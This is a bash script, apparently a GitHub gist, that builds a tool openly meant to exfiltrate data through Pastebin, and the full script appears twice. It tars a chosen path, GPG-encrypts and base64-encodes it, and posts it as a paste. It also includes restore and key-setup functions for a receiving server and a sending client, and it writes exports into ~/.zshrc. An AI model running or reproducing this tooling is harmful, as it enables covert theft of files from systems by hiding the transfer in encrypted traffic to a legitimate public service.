andersonbosa/pastebin-exfiltrator.sh

## pastebin-exfiltrator.sh
#!/usr/bin/env bash
# -*- coding: utf-8 -*-
# LICENSE: fully open-source
# AUTHOR: @t4inha < github.com/andersonbosa >
# GIST:

EXFILTRATOR_KEY="exfiltrator-key"
PUBLIC_EXFILTRATOR_KEY="${EXFILTRATOR_KEY}.public.key"
SECRET_EXFILTRATOR_KEY="${EXFILTRATOR_KEY}.secret.key"
GPG_KEYRING="$HOME/.gpg"
DEPENDENCIES=(gpg curl)

function usage() {
  cat <<EOF
exfiltrator [--help]

COMMANDS
  -c | --create)                    Create a new SECURE paste to exfiltrate data throght the Pastebin.
  -r | --restore)                   Restore a SECURE paste from Pastebin.
  -v | --verbose)                   Make it verbose.
  -h | --help)                      This help message.

SETUP
  -ss | --setup-server)             Setup a server to receive the data.
  -sc | --setup-client)             Setup a client to send the data.
EOF
}

#
# generates secret and public GPG key
#
# @see {@link https://www.misterpki.com/gpg-encrypt/}
# @returns {void}
function exfiltrator::generate_key() {
  has_key=$(gpg --list-keys grep $EXFILTRATOR_KEY | grep -Poe $EXFILTRATOR_KEY)
  if [[ "$has_key" == "$EXFILTRATOR_KEY" ]]; then
    #gpg: A key for "exfiltrator-key" already exists
    return 1
  fi

  echo "[INF] Generating your key ... type=rsa4096 permissions=sign,auth,encr expire_in=1m"
  GENERATED_KEY=$(gpg --quick-gen-key $EXFILTRATOR_KEY rsa4096 sign,auth,encr 1m)
  KEY_ID="$(echo $GENERATED_KEY | sed '2q;d' - | xargs)"
  echo "[DONE] $EXFILTRATOR_KEY key generated with id: $KEY_ID"
  return 0
}

#
# export given GPG Key by $KEY_ID in $GPG_KEYRING directorie.
#
# @param {string} $1 - KEY_ID
# @returns {void} -
function exfiltrator::export_gpg_keys_by_id() {
  echo "[INF] Exporting the GPG key: $EXFILTRATOR_KEY"
  mkdir -p $GPG_KEYRING
  gpg --armor --export $EXFILTRATOR_KEY >"${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}"
  gpg --armor --export-secret-keys $EXFILTRATOR_KEY >"${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}"
  cat <<EOF >>~/.zshrc
export EXFILTRATOR_PUBLIC_KEY_FILEPATH="${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}"
export EXFILTRATOR_SECRET_KEY_FILEPATH="${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}"
EOF

  echo "[DONE] Exported keys into $GPG_KEYRING:"
  ls $GPG_KEYRING
}

#
# Encrypts the input file with the exported public key in $EXFILTRATOR_PUBLIC_KEY_FILEPATH
#
# @params {string} $1 INPUT_FILE - filepath
# @param  {string} $2 OUTPUT_FILE - output filepath
# @returns {void} - generated a encrypted file with GPG in the format: original_name.gpg.
function exfiltrator::encrypt_file() {
  INPUT_FILE="$1"
  OUTPUT_FILE="$2"

  if [[ -z "$OUTPUT_FILE" ]]; then
    OUTPUT_FILE="${INPUT_FILE}.gpg"
  fi

  echo "[INF] Encrypting '$INPUT_FILE' with GPG public key ..."
  gpg -e -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $INPUT_FILE
  echo "[DONE] Encrypted to '$OUTPUT_FILE'"
  file $OUTPUT_FILE
  return 0
}

#
# Creates a new item in PasteBin.
# Compress the file in tgz, encryprafts with the public key, encodes binary with base64 and sends to PasteBin as text.
#
# @returns {string} - URL do novo item
function exfiltrator::create() {
  # TAR -> GPG -> B64 -> PASTEBIN
  INPUT_PATHNAME="$1"

  TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX)
  cd $TMP_PATHNAME
  echo "[INF] Created temporary directory: $TMP_PATHNAME"

  TAR_FILE="$INPUT_PATHNAME.tgz"
  echo "[INF] Compressing '$INPUT_PATHNAME' in a tar file '$TAR_FILE'"
  tar -cz -f $TAR_FILE $INPUT_PATHNAME
  file $TAR_FILE

  GPG_FILE="$TAR_FILE.gpg"
  exfiltrator::encrypt_file $TAR_FILE $GPG_FILE

  B64_FILE="${GPG_FILE}.b64"
  cat "$GPG_FILE" | base64 -w0 >$B64_FILE
  echo "[INF] Encoded '$GPG_FILE' using base64 to '$B64_FILE'"
  file $B64_FILE

  echo "[INF] Transmiting '$B64_FILE'..."
  pastebin "$(cat $B64_FILE)"

  cd - >/dev/null
}

#
# Restores a Pastebin file.
# PASTEBIN -> B64 -> GPG -> TAR
#
# @params {string} $1 PASTEBIN_KEY - Item id at Pastebin URL
function exfiltrator::restore() {
  PASTEBIN_KEY="$1"
  GPG_FILE="${PASTEBIN_KEY}.gpg"
  TAR_FILE="${GPG_FILE}.tgz"

  TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX)
  cd $TMP_PATHNAME
  echo "[INF] Created temporary directory: $TMP_PATHNAME"

  echo "[INF] Recovering exfiltred paste: '$PASTEBIN_KEY'..."
  pastebin -g $PASTEBIN_KEY | base64 -d >$GPG_FILE

  echo "[INF] Decrypting $GPG_FILE ..."
  gpg --output $TAR_FILE --decrypt -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $GPG_FILE

  echo "[INF] Extraing $TAR_FILE ..."
  tar -xz -f $TAR_FILE

  echo "[DONE] Paste recovered in '$TMP_PATHNAME'"
  ls $TMP_PATHNAME
}

function exfiltrator::import_gpg_keys_by_id() {
  echo "[INF] Importing public and secret GPG keys: $EXFILTRATOR_KEY"
  gpg --import $GPG_KEYRING/$SECRET_EXFILTRATOR_KEY
  gpg --import $GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY
}

#
# Prepare the server to receive client data that are going be encrypted with public key.
#
function exfiltrator::setup_server() {
  echo "[INF] Preparing server ..."
  KEY_ID=$(exfiltrator::generate_key)
  if [ $? -eq 1 ]; then
    echo "[ERR] The key already exists. Please manually remove it before generating a new one. Exiting ..."
    echo "[TIP] gpg --delete-secret-and-public-keys $EXFILTRATOR_KEY"
    return 1
  fi

  exfiltrator::export_gpg_keys_by_id $EXFILTRATOR_KEY
  exfiltrator::import_gpg_keys_by_id $EXFILTRATOR_KEY
  echo "[INF] Exporting the GPG key: $EXFILTRATOR_KEY"

  echo "[WRN] Keep your secret key safe! "
  echo "[INF] In client side use 'exfiltrator --setup-client'. Give your public key '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' to the client."
  echo "[TIP] Client script to install exfiltrator and setup client: https://gist.github.com/andersonbosa/29616c16e87159b6aad5e354fedcf2c0"
  echo "[DONE] Complete setup in server to receive data."
}

#
# Prepare the client to send data to the server that you will need asymmetric encryption.
#
function exfiltrator::setup_client() {
  mkdir -p $GPG_KEYRING
  KEY_PATH="$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY"
  echo "[INF] Paste exfiltrator public key from the server in the following file... openning..."
  echo "[TIP] Get your public key from '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' on the server side."
  sleep 1s
  nano $KEY_PATH
  echo "[INF] Exporting exfiltrator public key in .zshrc"
  cat <<EOF >>~/.zshrc
export EXFILTRATOR_PUBLIC_KEY_FILEPATH="$KEY_PATH"
EOF
  source ~/.zshrc
  gpg --import $KEY_PATH
  echo "[DONE] Client setuped to send data."
}

function exfiltrator() {
  IS_VERBOSE="0"
  PARAMS=""
  while (($#)); do
    case $1 in
    -ss | --setup-server)
      exfiltrator::setup_server
      return 0
      ;;
    -sc | --setup-client)
      exfiltrator::setup_client
      return 0
      ;;

    -c | --create)
      if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then
        exfiltrator::create "$2"
        return 0
      else
        echo "[ERR] Argument for $1 is missing" >&2
        return 1
      fi
      ;;

    -r | --restore)
      if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then
        exfiltrator::restore "$2"
        return 0
      else
        echo "[ERR] Argument for $1 is missing. Example: zbFdeRRK" >&2
        return 1
      fi
      ;;

    -v | --verbose)
      IS_VERBOSE="1"
      shift
      ;;

    -h | --help)
      usage
      return 1
      ;;

    -* | --*=) # unsupported flags
      echo "[ERR] Unsupported flag: $1" >&2
      return 1
      ;;

    *) # preserve positional arguments
      PARAMS="$PARAMS $1"
      shift
      ;;
    esac
  done

  # set positional arguments in their proper place
  eval set -- "$PARAMS"
}
	#!/usr/bin/env bash
	# -- coding: utf-8 --
	# LICENSE: fully open-source
	# AUTHOR: @t4inha < github.com/andersonbosa >
	# GIST:

	EXFILTRATOR_KEY="exfiltrator-key"
	PUBLIC_EXFILTRATOR_KEY="${EXFILTRATOR_KEY}.public.key"
	SECRET_EXFILTRATOR_KEY="${EXFILTRATOR_KEY}.secret.key"
	GPG_KEYRING="$HOME/.gpg"
	DEPENDENCIES=(gpg curl)

	function usage() {
	cat <<EOF
	exfiltrator [--help]

	COMMANDS
	-c \| --create) Create a new SECURE paste to exfiltrate data throght the Pastebin.
	-r \| --restore) Restore a SECURE paste from Pastebin.
	-v \| --verbose) Make it verbose.
	-h \| --help) This help message.

	SETUP
	-ss \| --setup-server) Setup a server to receive the data.
	-sc \| --setup-client) Setup a client to send the data.
	EOF
	}

	#
	# generates secret and public GPG key
	#
	# @see {@link https://www.misterpki.com/gpg-encrypt/}
	# @returns {void}
	function exfiltrator::generate_key() {
	has_key=$(gpg --list-keys grep $EXFILTRATOR_KEY \| grep -Poe $EXFILTRATOR_KEY)
	if [[ "$has_key" == "$EXFILTRATOR_KEY" ]]; then
	#gpg: A key for "exfiltrator-key" already exists
	return 1
	fi

	echo "[INF] Generating your key ... type=rsa4096 permissions=sign,auth,encr expire_in=1m"
	GENERATED_KEY=$(gpg --quick-gen-key $EXFILTRATOR_KEY rsa4096 sign,auth,encr 1m)
	KEY_ID="$(echo $GENERATED_KEY \| sed '2q;d' - \| xargs)"
	echo "[DONE] $EXFILTRATOR_KEY key generated with id: $KEY_ID"
	return 0
	}

	#
	# export given GPG Key by $KEY_ID in $GPG_KEYRING directorie.
	#
	# @param {string} $1 - KEY_ID
	# @returns {void} -
	function exfiltrator::export_gpg_keys_by_id() {
	echo "[INF] Exporting the GPG key: $EXFILTRATOR_KEY"
	mkdir -p $GPG_KEYRING
	gpg --armor --export $EXFILTRATOR_KEY >"${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}"
	gpg --armor --export-secret-keys $EXFILTRATOR_KEY >"${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}"
	cat <<EOF >>~/.zshrc
	export EXFILTRATOR_PUBLIC_KEY_FILEPATH="${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}"
	export EXFILTRATOR_SECRET_KEY_FILEPATH="${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}"
	EOF

	echo "[DONE] Exported keys into $GPG_KEYRING:"
	ls $GPG_KEYRING
	}

	#
	# Encrypts the input file with the exported public key in $EXFILTRATOR_PUBLIC_KEY_FILEPATH
	#
	# @params {string} $1 INPUT_FILE - filepath
	# @param {string} $2 OUTPUT_FILE - output filepath
	# @returns {void} - generated a encrypted file with GPG in the format: original_name.gpg.
	function exfiltrator::encrypt_file() {
	INPUT_FILE="$1"
	OUTPUT_FILE="$2"

	if [[ -z "$OUTPUT_FILE" ]]; then
	OUTPUT_FILE="${INPUT_FILE}.gpg"
	fi

	echo "[INF] Encrypting '$INPUT_FILE' with GPG public key ..."
	gpg -e -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $INPUT_FILE
	echo "[DONE] Encrypted to '$OUTPUT_FILE'"
	file $OUTPUT_FILE
	return 0
	}

	#
	# Creates a new item in PasteBin.
	# Compress the file in tgz, encryprafts with the public key, encodes binary with base64 and sends to PasteBin as text.
	#
	# @returns {string} - URL do novo item
	function exfiltrator::create() {
	# TAR -> GPG -> B64 -> PASTEBIN
	INPUT_PATHNAME="$1"

	TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX)
	cd $TMP_PATHNAME
	echo "[INF] Created temporary directory: $TMP_PATHNAME"

	TAR_FILE="$INPUT_PATHNAME.tgz"
	echo "[INF] Compressing '$INPUT_PATHNAME' in a tar file '$TAR_FILE'"
	tar -cz -f $TAR_FILE $INPUT_PATHNAME
	file $TAR_FILE

	GPG_FILE="$TAR_FILE.gpg"
	exfiltrator::encrypt_file $TAR_FILE $GPG_FILE

	B64_FILE="${GPG_FILE}.b64"
	cat "$GPG_FILE" \| base64 -w0 >$B64_FILE
	echo "[INF] Encoded '$GPG_FILE' using base64 to '$B64_FILE'"
	file $B64_FILE

	echo "[INF] Transmiting '$B64_FILE'..."
	pastebin "$(cat $B64_FILE)"

	cd - >/dev/null
	}

	#
	# Restores a Pastebin file.
	# PASTEBIN -> B64 -> GPG -> TAR
	#
	# @params {string} $1 PASTEBIN_KEY - Item id at Pastebin URL
	function exfiltrator::restore() {
	PASTEBIN_KEY="$1"
	GPG_FILE="${PASTEBIN_KEY}.gpg"
	TAR_FILE="${GPG_FILE}.tgz"

	TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX)
	cd $TMP_PATHNAME
	echo "[INF] Created temporary directory: $TMP_PATHNAME"

	echo "[INF] Recovering exfiltred paste: '$PASTEBIN_KEY'..."
	pastebin -g $PASTEBIN_KEY \| base64 -d >$GPG_FILE

	echo "[INF] Decrypting $GPG_FILE ..."
	gpg --output $TAR_FILE --decrypt -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $GPG_FILE

	echo "[INF] Extraing $TAR_FILE ..."
	tar -xz -f $TAR_FILE

	echo "[DONE] Paste recovered in '$TMP_PATHNAME'"
	ls $TMP_PATHNAME
	}

	function exfiltrator::import_gpg_keys_by_id() {
	echo "[INF] Importing public and secret GPG keys: $EXFILTRATOR_KEY"
	gpg --import $GPG_KEYRING/$SECRET_EXFILTRATOR_KEY
	gpg --import $GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY
	}

	#
	# Prepare the server to receive client data that are going be encrypted with public key.
	#
	function exfiltrator::setup_server() {
	echo "[INF] Preparing server ..."
	KEY_ID=$(exfiltrator::generate_key)
	if [ $? -eq 1 ]; then
	echo "[ERR] The key already exists. Please manually remove it before generating a new one. Exiting ..."
	echo "[TIP] gpg --delete-secret-and-public-keys $EXFILTRATOR_KEY"
	return 1
	fi

	exfiltrator::export_gpg_keys_by_id $EXFILTRATOR_KEY
	exfiltrator::import_gpg_keys_by_id $EXFILTRATOR_KEY
	echo "[INF] Exporting the GPG key: $EXFILTRATOR_KEY"

	echo "[WRN] Keep your secret key safe! "
	echo "[INF] In client side use 'exfiltrator --setup-client'. Give your public key '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' to the client."
	echo "[TIP] Client script to install exfiltrator and setup client: https://gist.github.com/andersonbosa/29616c16e87159b6aad5e354fedcf2c0"
	echo "[DONE] Complete setup in server to receive data."
	}

	#
	# Prepare the client to send data to the server that you will need asymmetric encryption.
	#
	function exfiltrator::setup_client() {
	mkdir -p $GPG_KEYRING
	KEY_PATH="$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY"
	echo "[INF] Paste exfiltrator public key from the server in the following file... openning..."
	echo "[TIP] Get your public key from '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' on the server side."
	sleep 1s
	nano $KEY_PATH
	echo "[INF] Exporting exfiltrator public key in .zshrc"
	cat <<EOF >>~/.zshrc
	export EXFILTRATOR_PUBLIC_KEY_FILEPATH="$KEY_PATH"
	EOF
	source ~/.zshrc
	gpg --import $KEY_PATH
	echo "[DONE] Client setuped to send data."
	}

	function exfiltrator() {
	IS_VERBOSE="0"
	PARAMS=""
	while (($#)); do
	case $1 in
	-ss \| --setup-server)
	exfiltrator::setup_server
	return 0
	;;
	-sc \| --setup-client)
	exfiltrator::setup_client
	return 0
	;;

	-c \| --create)
	if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then
	exfiltrator::create "$2"
	return 0
	else
	echo "[ERR] Argument for $1 is missing" >&2
	return 1
	fi
	;;

	-r \| --restore)
	if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then
	exfiltrator::restore "$2"
	return 0
	else
	echo "[ERR] Argument for $1 is missing. Example: zbFdeRRK" >&2
	return 1
	fi
	;;

	-v \| --verbose)
	IS_VERBOSE="1"
	shift
	;;

	-h \| --help)
	usage
	return 1
	;;

	-* \| --*=) # unsupported flags
	echo "[ERR] Unsupported flag: $1" >&2
	return 1
	;;

	*) # preserve positional arguments
	PARAMS="$PARAMS $1"
	shift
	;;
	esac
	done

	# set positional arguments in their proper place
	eval set -- "$PARAMS"
	}